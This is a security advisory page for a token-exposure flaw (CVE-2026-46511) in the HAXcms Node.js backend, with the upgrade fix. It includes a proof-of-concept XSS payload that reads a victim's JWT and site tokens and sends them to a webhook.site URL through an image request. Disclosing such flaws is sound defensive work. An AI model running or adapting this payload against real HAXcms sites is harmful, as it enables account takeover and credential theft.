Homepage

Insecure Storage of Sensitive Information Affecting @haxtheweb/haxcms-nodejs package, versions <26.0.0

Severity

 Recommended
0.0
high
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.07% (22nd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JS-HAXTHEWEBHAXCMSNODEJS-17179547
  • published5 Jun 2026
  • disclosed19 May 2026
  • credittrigerman
Report a new vulnerability Found a mistake?

Introduced: 19 May 2026

NewCVE-2026-46511  (opens in a new tab)
CWE-922  (opens in a new tab)

How to fix?

Upgrade @haxtheweb/haxcms-nodejs to version 26.0.0 or higher.

Overview

@haxtheweb/haxcms-nodejs is a HAXcms nodejs backend

Affected versions of this package are vulnerable to Insecure Storage of Sensitive Information via the connectionSettings function. An attacker can gain unauthorized access to authentication tokens and impersonate other users by injecting malicious scripts that exploit the exposure of sensitive session data in a global JavaScript variable and exfiltrate these tokens to an external server.

PoC

<iframe srcdoc="<script>
    const targetUsername = 'bto108'; // Replace with target victim

    fetch(`/${targetUsername}/system/api/connectionSettings`)
      .then(res => res.text())
      .then(data => {
          const s = JSON.parse(data.substring(data.indexOf('{'), data.lastIndexOf('}') + 1));
          
          const uToken = new URL(document.location.origin + s.getUserDataPath).searchParams.get('user_token');
          const sToken = new URL(document.location.origin + s.saveNodePath).searchParams.get('site_token');
          
          let aToken = 'N/A';
          if (s.appStore && s.appStore.params && s.appStore.params.appstore_token) {
              aToken = s.appStore.params.appstore_token;
          }

          // Exfiltrate via Image Request to bypass CORS
          const payload = btoa(JSON.stringify({
              target: targetUsername, 
              jwt: s.jwt, 
              user_token: uToken, 
              site_token: sToken, 
              appstore_token: aToken
          }));
          
          new Image().src = `https://webhook.site/YOUR-WEBHOOK-ID?data=${payload}`;
      });
</script>" style="display:none"></iframe>

References

CVSS Base Scores

version 4.0
version 3.1